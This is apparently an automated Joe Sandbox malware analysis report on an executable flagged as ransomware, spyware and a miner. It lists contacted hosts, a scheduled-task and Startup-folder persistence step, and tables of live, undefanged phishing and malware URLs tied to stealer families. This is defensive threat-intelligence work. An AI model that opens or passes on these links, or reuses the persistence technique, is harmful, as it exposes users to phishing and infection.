52.223.22.214	us-east-eb2.3lift.com	United States	8987	AMAZONEXPANSIONGB	false
172.241.51.69	lb-sin.mgid.com	Netherlands	394380	LEASEWEB-USA-DAL-10US	false

Private

IP
127.0.0.1
192.168.11.20

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1547069
Start date and time:	2024-11-01 20:48:56 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 17m 41s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit 20H2 Native physical Machine for testing VM-aware malware (Office 2019, Chrome 128, Firefox 91, Adobe Reader DC 21, Java 8 Update 301
Run name:	Suspected Instruction Hammering
Number of analysed new started processes analysed:	55
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	JHPvqMzKbz.exe
Detection:	MAL
Classification:	mal100.rans.troj.spyw.expl.evad.mine.winEXE@106/193@35/23
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 100% Number of executed functions: 81 Number of non-executed functions: 298
Cookbook Comments:	Found application associated with file extension: .exe Sleeps bigger than 100000000ms are automatically reduced to 1000ms

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, WerFault.exe, CompPkgSrv.exe, backgroundTaskHost.exe, WmiPrvSE.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 199.232.214.172, 142.250.72.99, 142.251.41.14, 142.251.16.84, 34.104.35.123, 104.40.82.182, 52.159.108.190, 20.42.65.92, 142.250.176.195, 142.251.40.174, 4.152.199.46, 13.107.42.16, 20.96.153.111, 204.79.197.203, 4.152.133.8, 23.57.90.133, 23.57.90.170, 23.57.90.132, 23.57.90.169, 23.57.90.171, 23.57.90.135, 23.57.90.139, 23.57.90.136, 23.57.90.134, 23.57.90.163, 23.57.90.164, 23.57.90.165, 23.57.90.160, 23.57.90.167, 23.57.90.162, 23.57.90.166, 23.200.88.40, 23.200.88.42, 23.200.88.32, 23.200.88.35, 23.200.88.43, 23.200.88.38, 23.200.88.33, 23.200.88.31, 23.200.88.36, 104.117.182.43, 104.117.182.73, 104.117.182.59, 104.117.182.32, 104.117.182.58, 20.110.205.119, 13.107.21.237, 204.79.197.237, 13.107.21.239, 204.79.197.239, 40.79.167.8, 23.57.90.69, 23.57.90.78, 13.107.42.14, 104.70.121.177, 104.70.121.179, 104.70.121.187, 104.70.121.193, 104.70.121.170, 104.70.121.176, 104.70.121.208, 104.70.121.192, 104.70.121.202, 204.79.197.219, 20.33.55.12, 23.199.50.102, 142.250
Excluded domains from analysis (whitelisted): prod-atm-wds-nav.trafficmanager.net, data-edge.smartscreen.microsoft.com, img-s-msn-com.akamaized.net, clientservices.googleapis.com, p-static.bing.trafficmanager.net, nav.smartscreen.microsoft.com, l-0005.l-msedge.net, clients2.google.com, e86303.dscx.akamaiedge.net, login.live.com, config-edge-skype.l-0007.l-msedge.net, www.gstatic.com, l-0007.l-msedge.net, iris-de-prod-azsc-v2-eus2.eastus2.cloudapp.azure.com, e28578.d.akamaiedge.net, www.bing.com, assets.msn.com.edgekey.net, c-bing-com.dual-a-0034.a-msedge.net, onedscolprdaue02.australiaeast.cloudapp.azure.com, pixel-sync.trafficmanager.net, prod-atm-wds-edge.trafficmanager.net, deff.nelreports.net.akamaized.net, www-www.bing.com.trafficmanager.net, prod-agic-wu-3.westus.cloudapp.azure.com, a1834.dscg2.akamai.net, onedsblobprdeus17.eastus.cloudapp.azure.com, edgedl.me.gvt1.com, prod-agic-ncu-1.northcentralus.cloudapp.azure.com, c.bing.com, blobcollector.events.data.trafficmanager.net, umwatson.events.data.micro
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing behavior information.
Report size getting too big, too many NtAllocateVirtualMemory calls found.
Report size getting too big, too many NtOpenFile calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryAttributesFile calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtSetInformationFile calls found.
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
VT rate limit hit for: JHPvqMzKbz.exe

Simulations

Behavior and APIs

Time	Type	Description
15:51:51	API Interceptor	346x Sleep call for process: Plates.pif modified
15:56:45	API Interceptor	48x Sleep call for process: SkySync.scr modified
20:51:10	Task Scheduler	Run new task: Enjoy path: wscript s>//B "C:\Users\user\AppData\Local\SkySync Technologies\SkySync.js"
20:51:10	Autostart	Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SkySync.url

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
68.67.179.155	invoice 700898 for wallcentre.com.shtml	Get hash	malicious	Unknown	Browse
	FW Server Notice Heatherg System Alert Notification..eml	Get hash	malicious	HTMLPhisher	Browse
	https://url.us.m.mimecastprotect.com/s/h59bCNkB7XSEM8B9imsaV7?domain=Ccfi	Get hash	malicious	Unknown	Browse
	http://amc.ana.co.jp/?4_--_300066_--_614620_--_4	Get hash	malicious	Unknown	Browse
	https://www.opustrustweb.com/EmailTrackerAPI/open?token=eyJhbGciOiJkaXIiLCJlbmMiOiJBMTI4Q0JDLUhTMjU2In0..62tVk07eUS1tgkfaDkQOqQ.nL-JZjGlYSBu9AibCOqK7-wJ7VXqjfoMrgeXwHgP6tLPx4s2jjofEWjZh794Ex5FiocFlK50_YxzembNjUsYkjIjaFyaIpNIDSPFE46cBlrxNy-t9VcCVcfKZphrojE0.AXzXZielor8D6px-r_wTOg&url=https://minicursodamariana.fun/nu/slceitil@emfa.pt	Get hash	malicious	HTMLPhisher	Browse
	IDM Trial Reset.exe	Get hash	malicious	Unknown	Browse
	https://villademacotera.com/card	Get hash	malicious	Unknown	Browse
	https://yhs-world-aged-dust-4671.aubrey744.workers.dev/favicon.ico	Get hash	malicious	HTMLPhisher	Browse
	https://autode.sk/4bb5BeV	Get hash	malicious	HtmlDropper, HTMLPhisher	Browse
	https://url.us.m.mimecastprotect.com/s/qkT5Cv2pWyUOjZODty9fnF?domain=google.com	Get hash	malicious	Unknown	Browse
23.199.48.23	https://mandrillapp.com/track/click/30551860/topbusiness.ro?p=eyJzIjoiWmkwVnFVYXdRYlFmYnVnd3Y3OWdtR2h1anpvIiwidiI6MSwicCI6IntcInVcIjozMDU1MTg2MCxcInZcIjoxLFwidXJsXCI6XCJodHRwczpcXFwvXFxcL3RvcGJ1c2luZXNzLnJvXFxcL3dwLWFkbWluXFxcL2pzXFxcL3dpZGdldHNcXFwvbWVkaWFcXFwvP2FjdGlvbj12aWV3JjE0MD1jMk52ZEhRdVpHRm9ibXRsUUd4allYUjBaWEowYjI0dVkyOXQmcjE9MTQwJnIyPTE0MCZub2lzZT00Q0hBUlwiLFwiaWRcIjpcImVjMTY1MjE1OWRhYTRjZTA5ZGZhODE5NTEzNzU2Mjg1XCIsXCJ1cmxfaWRzXCI6W1wiOGMyZTc5NjYyNTU5N2FjNDFlODZkYmM4MWMwMjI2MTFjZjYyYTIzMlwiXX0ifQ	Get hash	malicious	HTMLPhisher	Browse
	http://marketplace-item-details-98756222.zya.me	Get hash	malicious	HTMLPhisher	Browse
	https://truj.pages.dev/robots.txt	Get hash	malicious	HTMLPhisher	Browse
	https://pub-dbce98adcacd4e49a4cb64cc36d27ee5.r2.dev/login.htm	Get hash	malicious	Unknown	Browse
	http://www.die-senioren.de	Get hash	malicious	Unknown	Browse
	edge_x86_KB91412024.exe	Get hash	malicious	Unknown	Browse
	edge_x86_KB91412024.exe	Get hash	malicious	Unknown	Browse
	https://ibit.ly/let-us-feature-your-business-204	Get hash	malicious	Unknown	Browse
	http://livespoints.com/sso.dsv.com	Get hash	malicious	Unknown	Browse
	https://laser-gravur.cc/uploads/go.php?0g6dc	Get hash	malicious	Unknown	Browse
20.189.173.1	c20346ef.msg	Get hash	malicious	Unknown	Browse
	https://url.uk.m.mimecastprotect.com/s/879wCp9pjInpwnDHPf7CG_Zsy?domain=aerographicsut-my.sharepoint.com	Get hash	malicious	HTMLPhisher	Browse
	Aisha C. Yetman shared you a document..msg	Get hash	malicious	Unknown	Browse
	https://www.google.com/url?q=3HOSozuuQiApLjODz3yh&rct=tTPSJ3J3wDFX0jkXyycT&sa=t&esrc=WSECxFgECA0xys8Em2FL&source=&cd=HXUursu8uEcr4eTiw9XH&cad=XpPkDfJ9mfdQ6lDJVS0Y&ved=xjnktlqryYWwZIBRrgvK&uact=&url=amp/s/%E2%80%8Bcd%C2%ADlsao%C2%ADmja%C2%ADte%C2%AD.h%C2%ADi%E2%80%8Ba%C2%ADz%C2%ADw%E2%80%8B.i%C2%ADr%2F.well-know%2Fre%2F1781008251/amVzc2ljYS5tZWFyc0BwZXJzaW1tb25ob21lcy5jb20=	Get hash	malicious	Unknown	Browse
	https://abex.co.in/1/?clickid=crj4hrne79is73f9g3kg&lp_key=17263275da2fd8c1a244a24d3218001b69e7968282&t1=1083194587&t2=.us.05.desktop.nonadult.windows.edge&key=7dfcf14e88e3f6336162#	Get hash	malicious	Unknown	Browse
	i45qm2Cawa	Get hash	malicious	Unknown	Browse
	https://homedigital.cloud/YoM8n6uU7J/.d7g/3Ugx2oDrh4/aGVscGRlc2tAZ290ZWNobm9sb2dpeC5jb20=	Get hash	malicious	HTMLPhisher	Browse
	Quarantined Messages(6).zip	Get hash	malicious	HTMLPhisher	Browse
	Focus Insolvency Group.xlsx	Get hash	malicious	Unknown	Browse
	https://content.td.org/r/11019?pocc=CERT_CC&TraxPassThrough=https://pibs.hiservers.net/vix/index.html	Get hash	malicious	Unknown	Browse
104.19.131.76	http://www.bollywoodhungama.com	Get hash	malicious	Unknown	Browse
	https://beforeitsnews.com/health/2024/10/the-happier-meditation-app-is-offering-free-1-year-access-99-value-3059722.html	Get hash	malicious	Unknown	Browse
	https://beforeitsnews.com/health/2024/10/the-happier-meditation-app-is-offering-free-1-year-access-99-value-3059722.html	Get hash	malicious	Unknown	Browse
	https://beforeitsnews.com/health/2024/10/the-happier-meditation-app-is-offering-free-1-year-access-99-value-3059722.html	Get hash	malicious	Unknown	Browse
	https://swiftclaimairdropmeta.pages.dev/	Get hash	malicious	HTMLPhisher	Browse
	http://en-alldappfix.pages.dev/	Get hash	malicious	HTMLPhisher	Browse
	https://solanadefimainnet.pages.dev/	Get hash	malicious	HTMLPhisher	Browse
	http://nodechain-launchpadlpx.pages.dev/	Get hash	malicious	HTMLPhisher	Browse
	https://simplescalingdefender.pages.dev/	Get hash	malicious	Unknown	Browse
	http://rewardsforyoutoclaim.pages.dev/	Get hash	malicious	Unknown	Browse

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
nydc1.outbrain.org	https://wetransfer.com/downloads/bd15c1f671ae60c5a56e558eb8cc43bf20241030150256/3b30cd5b9ce1ffb29d79c9118153941c20241030150256/70baef?t_exp=1730559776&t_lsid=6bd545a9-d09b-4abd-a317-124dbe9fe64d&t_network=email&t_rid=YXV0aDB8NjZlYWI0YTExODhmYzc1OGMzMmNiODIx&t_s=download_link&t_ts=1730300576&utm_campaign=TRN_TDL_01&utm	Get hash	malicious	HTMLPhisher	Browse	64.202.112.223
	http://www.thegioimoicau.com/	Get hash	malicious	Unknown	Browse	64.202.112.127
	https://www.ccleaner.com/	Get hash	malicious	Unknown	Browse	70.42.32.223
	https://beforeitsnews.com/health/2024/10/the-happier-meditation-app-is-offering-free-1-year-access-99-value-3059722.html	Get hash	malicious	Unknown	Browse	70.42.32.127
	https://beforeitsnews.com/health/2024/10/the-happier-meditation-app-is-offering-free-1-year-access-99-value-3059722.html	Get hash	malicious	Unknown	Browse	64.202.112.223
	https://attservicesinc.weebly.com/	Get hash	malicious	HTMLPhisher	Browse	64.202.112.31
	https://hy.markkasmick.click/cx/tbSgVco_akr35UznLBgMmL_dGwr4A9B_vyg2WwEB0w1LRjKjQMyEnB89mCfTRy8oqnbpdFunqinBhx0TsHvSJdUHnbksc3kdcKecoDvVHa5LAm46atMmRo3D2CHoEu2bmOqt4Ic8O_7AE7Igwgbi5c8zmZf6Fqp_XqcjREPr7609oL7vKm8FfjGLhMetr2oxtpR3ywH4BUElgc7EI7usxj8CJYEUMktwlb7YUzPvYQ7P1PilEV0LqiXI5sm6QVF4ZGl5TIXhnQLOG0kl6WQ0miiZysBfhaNojnPTUvisUUkwOp2fYTxkXEIhZ7ESJ7qXYLxQbmy4RJVeZZZ3RY5rX8W5t8cudSM9Zx7UaxgLH56aOv81v4QfUnzroT9v7LR3jPEjzYXr2LwuykYQnzvV6boWlogU4jkPE6MocRRlRoC6uUx2e1Wseo8MqGWTT2uXo4HbQDneiMF84sQ34*3TnbAxXWu8xLbb_mAOQxUTA3T5TUUZKeU3ziolM8TSVV5Y5LQTFGtNArddwJKdWCb_cLYMxUJpZ3cqM_A	Get hash	malicious	Unknown	Browse	64.202.112.63
	https://mb3.io/y6jt3ofc	Get hash	malicious	Unknown	Browse	64.202.112.223
	https://issuu.com/ryanrodger/docs/smn8263528?fr=sMTQ5NTc4NTgxNDc	Get hash	malicious	Unknown	Browse	64.202.112.191
	https://l24.im/lB5Ty	Get hash	malicious	Unknown	Browse	64.202.112.159
chrome.cloudflare-dns.com	file.exe	Get hash	malicious	Stealc, Vidar	Browse	172.64.41.3
	file.exe	Get hash	malicious	Stealc, Vidar	Browse	172.64.41.3
	file.exe	Get hash	malicious	Stealc, Vidar	Browse	172.64.41.3
	https://u7990385.ct.sendgrid.net/ls/click?upn=u001.oZ6GXC16Ztdw1ob-2F3C5yow-2FsK2YC4S8s269h9OLgp-2FGcQesCtXDXKgCEAF90Sa3OUL2ncGoAKstQjRhddelr-2Bx3frrehyL8aaBbhAx-2Fm3uQTToUZwzw9vU-2BHl4N8-2FbXNOWh47xHSpNswH5B20hFc1rkwm1HkocouB6puE-2FnM91Ea9xIyldie1eyHQvDQGF6-2F1OUGSCOg8K-2Fk8REDXGncryLNWAkNll9tI4svh29XngoJuJcvPHIwWw07juA1Lr687mlf_LZJN6rqeZVHTY7vi7TysfnSOWUsKUPL2t2FWuf1mHJZyRrnfnXk5in-2FtsLaVkEL4z-2F5H1v5rdZCMtKV4-2B7XswPaXSOX44YEil-2BgQ6f1-2BLxpcwnoVslshbeFD8-2FSkDYUL5gsTS7cnhi8iHs4T9b6wzPIbVlUAEwQAwoGeUFJH5x3RAGtspzpDyRWDwHNrMMOluLHeocJQAj7iS1dnS-2B-2Fhpf21Fjpr9lUosnkGJYIkfG0KNsjglBmf2yQvwZsg0Wp706kciqJgB5pqtemV1qFgZLIL2K-2BsyRLGqv3bbeqv6LWX-2Fbn97e4q8h4LdJzfXKTxRJD2tMgj2k7Ls1BdPjLturPdeJvpG2db-2FhwENpXetZR7k21gPz6in5zk7zhcmgIkZssf1WUkdDcjfwIeY2HuQe6EHwacpAnjlFSG7cGBDYbRKnbjWz72QvhesvDQrxGZA-2F-2FwuD5CryGFeRAazVMLU-2FTUgYuXTJzCzL6qav9lYxCC-2Bwx97sSjci4FffUtDhPcIZfKCP-2Ff9rufbc-2FOdTD6VLIHU5lNW4k8Nb-2FWedSu8kS9RXhRxjWAbV4qYK-2F68HLgFHbzOrm6M-2FG6a-2BnVs9TkK9ei8xVDo6cAhkQYCxDYOCBJJC-2BfLWulZgQ85hdg59312Kv6zX2g11nE5GRn-2B6U-2B2tuv67vEmY8CUatMt7UrQHEhVlrPnXi1EamUHW4AGpMQfKBj0GXRdJxG0fD3Zx-2FiIXcDEoi3GhoWLQTKZU-2FWlBKJiyqDLjDXS6qRg1X-2Fsd3R5k7fswdpYLTizSHt12T6-2Bo0IoKg0cyJsPKBfoK9Uleu7f9wgtdH4RtvaMbk9-2Buqhl6zW9NHZET-2BbGJHqyqlBeTSBtTZM6ltHEDZrojb0Lhszq-2BKoSCsuyjzgKAFmmWSRMGxwsXoHHuV8LoFEZjuiOSkTWEP-2FvQ0ZaWfqnp81VXTEktfVY9Xmx-2FaHq5NRH3vqpZc6LNkkSHnpJBPIYA83Mw-3D-3D	Get hash	malicious	Unknown	Browse	162.159.61.3
	file.exe	Get hash	malicious	Stealc, Vidar	Browse	162.159.61.3
	file.exe	Get hash	malicious	Stealc, Vidar	Browse	162.159.61.3
	file.exe	Get hash	malicious	Stealc, Vidar	Browse	172.64.41.3
	https://www.transfernow.net/dl/20241030KnXGth9f	Get hash	malicious	Unknown	Browse	162.159.61.3
	https://dzentec-my.sharepoint.com/:u:/g/personal/i_lahmer_entec-dz_com/EdYp5IxQ-uxJivnPAqSzv40BZiCX7sphz7Kj8JDyRBKqpQ?e=wqutC4	Get hash	malicious	Unknown	Browse	162.159.61.3
	file.exe	Get hash	malicious	PureCrypter, LummaC, Amadey, LummaC Stealer, Stealc, Vidar, WhiteSnake Stealer	Browse	162.159.61.3
cm.mgid.com	http://manatoki463.net	Get hash	malicious	Unknown	Browse	104.19.129.76
	https://beforeitsnews.com/health/2024/10/the-happier-meditation-app-is-offering-free-1-year-access-99-value-3059722.html	Get hash	malicious	Unknown	Browse	104.19.129.76
	https://beforeitsnews.com/health/2024/10/the-happier-meditation-app-is-offering-free-1-year-access-99-value-3059722.html	Get hash	malicious	Unknown	Browse	104.19.130.76
	https://beforeitsnews.com/health/2024/10/the-happier-meditation-app-is-offering-free-1-year-access-99-value-3059722.html	Get hash	malicious	Unknown	Browse	104.19.132.76
	http://dat2.store	Get hash	malicious	Unknown	Browse	104.19.132.76
	https://pcrestore.org/	Get hash	malicious	Unknown	Browse	104.19.131.76
	https://swiftclaimairdropmeta.pages.dev/	Get hash	malicious	HTMLPhisher	Browse	104.19.129.76
	https://lil-loveeeees.blogspot.com/	Get hash	malicious	Unknown	Browse	104.19.133.76
	https://ole798.com/	Get hash	malicious	Unknown	Browse	104.19.132.76
	http://en-alldappfix.pages.dev/	Get hash	malicious	HTMLPhisher	Browse	104.19.131.76

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
CLOUDFLARENETUS	26HY8aPgae.exe	Get hash	malicious	Unknown	Browse	188.114.97.3
	lkIbbNB9ba.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, Stealc, Vidar	Browse	104.21.33.140
	veP7s9qIRC.exe	Get hash	malicious	LummaC	Browse	104.21.33.140
	xJZvlpVpkx.exe	Get hash	malicious	LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc	Browse	188.114.96.3
	file.exe	Get hash	malicious	LummaC	Browse	104.21.33.140
	Quotation.exe	Get hash	malicious	AgentTesla, GuLoader	Browse	104.26.13.205
	https://www.blockchain.com/explorer	Get hash	malicious	Xmrig	Browse	104.21.63.32
	file.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	188.114.97.3
	file.exe	Get hash	malicious	Stealc, Vidar	Browse	172.64.41.3
	Ziraat Bankasi Swift Mesaji.pdf.exe	Get hash	malicious	MassLogger RAT	Browse	188.114.96.3
AKAMAI-ASN1EU	file.exe	Get hash	malicious	Stealc, Vidar	Browse	23.221.22.209
	https://acrobat.adobe.com/id/urn:aaid:sc:VA6C2:595729f4-6ee1-464c-a534-c9dd79612c8d	Get hash	malicious	HTMLPhisher	Browse	2.16.238.6
	file.exe	Get hash	malicious	Stealc, Vidar	Browse	23.221.22.48
	file.exe	Get hash	malicious	Stealc, Vidar	Browse	23.221.22.211
	https://u7990385.ct.sendgrid.net/ls/click?upn=u001.oZ6GXC16Ztdw1ob-2F3C5yow-2FsK2YC4S8s269h9OLgp-2FGcQesCtXDXKgCEAF90Sa3OUL2ncGoAKstQjRhddelr-2Bx3frrehyL8aaBbhAx-2Fm3uQTToUZwzw9vU-2BHl4N8-2FbXNrXNM8F2aafYGXvb9twEoQeHC7ZwjccAi1SjLazzmL714x6k-2BjB-2FYwt496nNWzarkpA5xghtVvgqYssmknAftbQJOVkiDX5sql0puMOlG6Ca2eid008YPu-2FJJAayp-2BNXls84A_lhEpvcamcm95WhC017PRgRonrgi5omZ3brQwNa5yLk0xxDl3uLY9zV0ZhBwsp9AfIBgWj8srFe156S5Zns8ZjIc0B22GBm-2FhZ3msRvLKzUyGIuCFlA1E-2FK-2F4jc3IgU8qM5k5KxMmIwIRDSCQDvTZvmwB5zeTeqWWEJR7CvWSpeaqIj3hj5IgcRcoPBdptLYrUK3YLUsGuU0Nn50M3ArOROvseGYqZul0QkeqtDR41-2FsPFt-2Bw0YWW2P5gsCDH4XINxncIhICPIqlacC1ih-2B-2BRAhsouCrf5nolEyzWx0VnR2OrLuGwvR4-2BmBTgXGq5SQJ3CbNvM-2FaB5BLerpFqmqjPC-2FBlK6th1iVrhfmtBEFKLash-2FnkPpQ9qFxGwWTexJMh100AS4PilK2-2BJDfvjssuxk2jP-2BTagNOazV2F1Jk9Mugr3y7E9SivEGWyUbzdMThmnpVydb1qOFwMiocztErv1WWaB8B20Oa2SLt-2BLBsMdusfLwd3NNzPre6el-2F-2BIwBxDAqBb9JLV6vOLzfaD2L4-2BEuPbgzcrscVtaCNyARGoPUKi03imhTbJEcig8L4weEiABND5vwKtA-2FhKo5AjxecXMO22Vq7Og2y7v-2BJNgFB9rr-2Bm4W45XZxFP39Dqi18SUPOKX4pHFrdACciPinuj2QtBtIGNjV46-2Bve9hu0g1-2FpG1tOVv9Ebn32k-2Bl6CF6b6jzS3aTQvZkWKNIwLx5CoGs9uomn9yZPi6QaiSTeQkZ1uHupSYpVxbBCb-2FUyo6kMlbB0P27ShEzUFVY-2FpfPcfFofTKD4p7rklaM-2FIuG8-2F3ytR7SJ7I8GmSP8NTWs4vu3NTpV5MkgHfjeFoK-2BDQh6M7S2ys2qIf8m3qiLtFMHY6p7m4ep8JZqbC0axloFSX-2Fzbz51ZW-2BsyQEEbRqwx0S1i4lo9NhRXrfXOvn0A83bBDk31g9QfoWTGhHCjSEfuca9KJwe0GCABYAuqYeYHMc5qXhPv86r0l0ldRpwe39V9LJ5m6Go-3D	Get hash	malicious	Unknown	Browse	88.221.110.91
	E_dekont.cmd	Get hash	malicious	DBatLoader, Nitol, PureLog Stealer, XWorm	Browse	172.234.222.138
	file.exe	Get hash	malicious	Stealc, Vidar	Browse	23.222.241.137
	file.exe	Get hash	malicious	Stealc, Vidar	Browse	23.47.194.99
	original.eml	Get hash	malicious	Mamba2FA	Browse	88.221.110.227
	Y2EM7suNV5.exe	Get hash	malicious	MassLogger RAT	Browse	172.234.222.138
ASN-APPNEXUS	https://send-space.s3.eu-north-1.amazonaws.com/de.html	Get hash	malicious	Unknown	Browse	37.252.172.123
	Fw Message from Kevin - Update on Coles Supply Chain Modernisation 31-10-24.eml	Get hash	malicious	Unknown	Browse	185.89.210.141
	http://3d1.gmobb.jp/dcm299ccyag4e/gov/	Get hash	malicious	Phisher	Browse	37.252.172.123
	http://archzine.net	Get hash	malicious	Unknown	Browse	37.252.171.21
	Reminders for Msp-partner_ Server Alert.eml	Get hash	malicious	HTMLPhisher	Browse	37.252.171.52
	https://wetransfer.com/downloads/bd15c1f671ae60c5a56e558eb8cc43bf20241030150256/3b30cd5b9ce1ffb29d79c9118153941c20241030150256/70baef?t_exp=1730559776&t_lsid=6bd545a9-d09b-4abd-a317-124dbe9fe64d&t_network=email&t_rid=YXV0aDB8NjZlYWI0YTExODhmYzc1OGMzMmNiODIx&t_s=download_link&t_ts=1730300576&utm_campaign=TRN_TDL_01&utm	Get hash	malicious	HTMLPhisher	Browse	185.89.210.122
	https://www.mediafire.com/file/oyfycncwen0a3ue/DSP_Plan_Set.zip/file	Get hash	malicious	Unknown	Browse	185.89.210.46
	https://www.google.im/url?q=38pQvvq6xRyj7Y00xDjnlx9kIHOSozurMOiaAkImPuQJnOIWtJjqJLi6stjtDz3yh&rct=tTPSrMOiaAkImPuQJnOIWtJjqJLi6stjtFX08pQvvq6xRyj7Y00xDjnlx9kIjusucT&sa=t&url=amp/s/cristorei.neemo.com.br/yaya/aALPghQuwJ38KMxdobOJdzxm/YW50b25lbGxhLmNvc3RhQGVzYS5pbnQ=	Get hash	malicious	Tycoon2FA	Browse	185.89.210.212
	https://clickme.thryv.com/ls/click?upn=u001.Als7cfHaJU2yMdsJgpsIFmiRUl-2BtxcZ73D3PC6s7dEdSEpNEVf7BmEr33HzpWyzDy2Qc_OEO3HRIZ3eedLymwLhvJt9sqs3j4T3CqpVCO9A0ZKplqH1W1Ad1lCPdQBrRfbSauZPLLCLTYBsXDRt8yGG5FOZ7NK342oFTufTBA9n-2F9XZML5SAWON4OCquRGeOrZOG6X7bKIH2ouDi7O5ssZhkwdV9j8BuAetGO74HzivTb4yjw5AGX5ZMnsGYBS3vBuNNgFYRVSYVxc5dN7eCLDUr43XjgYUZE2GmJzXmN-2BelIHWKsvaOOIeqiW6cnMf2CI6MeEhodwtV2LpZJtWZhkGi5I2rlc08PnxbPlMsOj2Cr9oC-2BCWb9WuPqmZU8rqYD8CNL-2BgY3UElGOq-2BfG3NfYFdrc0Rb11eU0t5G2ihyqzzZVfI-3D#cHNjaG1pdHRAZ3Jpc3Qub3Jn	Get hash	malicious	Unknown	Browse	185.89.211.84
	scan1738761_rsalinas@wcctxlaw.com.pdf	Get hash	malicious	HTMLPhisher	Browse	37.252.171.53
MICROSOFT-CORP-MSN-AS-BLOCKUS	F2Y5tbGngK.exe	Get hash	malicious	Stealc, Vidar	Browse	20.42.65.92
	lkIbbNB9ba.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, Stealc, Vidar	Browse	104.208.16.94
	file.exe	Get hash	malicious	Stealc, Vidar	Browse	20.75.60.91
	Transfer_Details.xls	Get hash	malicious	Unknown	Browse	13.107.246.45
	ServiceRequest.xls	Get hash	malicious	Unknown	Browse	13.107.246.45
	https://docsend.com/view/yvdhrcvq4c4p7xrd	Get hash	malicious	HTMLPhisher	Browse	13.107.246.60
	https://issuu.com/mathildagr/docs/pmd9746827?fr=sZTMyNjc4NzAyNzM	Get hash	malicious	Unknown	Browse	150.171.28.10
	DMv89K955Y.exe	Get hash	malicious	LummaC, Clipboard Hijacker, Cryptbot, LummaC Stealer	Browse	13.89.179.12
	file.exe	Get hash	malicious	Stealc, Vidar	Browse	94.245.104.56
	https://issuu.com/mathildagr/docs/pmd9746827?fr=sZTMyNjc4NzAyNzM	Get hash	malicious	Unknown	Browse	150.171.28.10

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
28a2c9bd18a11de089ef85a160da29e4	https://www.blockchain.com/explorer	Get hash	malicious	Xmrig	Browse	20.190.152.20 40.126.24.149
	file.exe	Get hash	malicious	Stealc, Vidar	Browse	20.190.152.20 40.126.24.149
	https://secure.2checkout.com/affiliate.php?ACCOUNT=LANTECHS&AFFILIATE=120043&PATH=https%3A%2F%2FV0F5F.apexstructural.co	Get hash	malicious	HtmlDropper, HTMLPhisher	Browse	20.190.152.20 40.126.24.149
	Transfer_Details.xls	Get hash	malicious	Unknown	Browse	20.190.152.20 40.126.24.149
	o3QbCA4xLs.exe	Get hash	malicious	Stealc, Vidar	Browse	20.190.152.20 40.126.24.149
	https://hubs.ly/Q02WCPYS0	Get hash	malicious	Unknown	Browse	20.190.152.20 40.126.24.149
	ServiceRequest.xls	Get hash	malicious	Unknown	Browse	20.190.152.20 40.126.24.149
	https://docsend.com/view/yvdhrcvq4c4p7xrd	Get hash	malicious	HTMLPhisher	Browse	20.190.152.20 40.126.24.149
	https://www.google.co.th/url?q=jODz3y3HOSozuuQiApLh&rct=5CHARyytTPSJ3J3wDcT&sa=t&esrc=sf_rand_string_mixed(5)FgECA0xys8Em2FL&source=&cd=HXUursu8uEcr4eTiw9XH&cad=XpPkDfJ6CHARlDJVS0Y&ved=xjnktlqryYWwZIBRrgvK&uact=&url=amp%2Fir.nbaikp3.sa.com%2Fdelaw%2Flawn%2Fkoo%2Fsf_rand_string_mixed(24)/william.ferebee@steptoe-johnson.com	Get hash	malicious	HTMLPhisher	Browse	20.190.152.20 40.126.24.149
	https://issuu.com/mathildagr/docs/pmd9746827?fr=sZTMyNjc4NzAyNzM	Get hash	malicious	Unknown	Browse	20.190.152.20 40.126.24.149
37f463bf4616ecd445d4a1937da06e19	SecuriteInfo.com.Trojan.DownLoad4.16907.22610.407.exe	Get hash	malicious	Unknown	Browse	149.154.167.99 188.245.203.37
	SecuriteInfo.com.Trojan.DownLoad4.16905.7671.26379.exe	Get hash	malicious	AsyncRAT, DcRat	Browse	149.154.167.99 188.245.203.37
	SecuriteInfo.com.Trojan.DownLoad4.16907.22610.407.exe	Get hash	malicious	Unknown	Browse	149.154.167.99 188.245.203.37
	1364. 2024.exe	Get hash	malicious	AgentTesla	Browse	149.154.167.99 188.245.203.37
	Quotation.exe	Get hash	malicious	AgentTesla, GuLoader	Browse	149.154.167.99 188.245.203.37
	o3QbCA4xLs.exe	Get hash	malicious	Stealc, Vidar	Browse	149.154.167.99 188.245.203.37
	s0zj3gVOXC.exe	Get hash	malicious	Zhark RAT	Browse	149.154.167.99 188.245.203.37
	AVCAOCT4jW.exe	Get hash	malicious	Zhark RAT	Browse	149.154.167.99 188.245.203.37
	s0zj3gVOXC.exe	Get hash	malicious	Zhark RAT	Browse	149.154.167.99 188.245.203.37
	AVCAOCT4jW.exe	Get hash	malicious	Zhark RAT	Browse	149.154.167.99 188.245.203.37

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
C:\ProgramData\chrome.dll	F2Y5tbGngK.exe	Get hash	malicious	Stealc, Vidar	Browse
	file.exe	Get hash	malicious	Stealc, Vidar	Browse
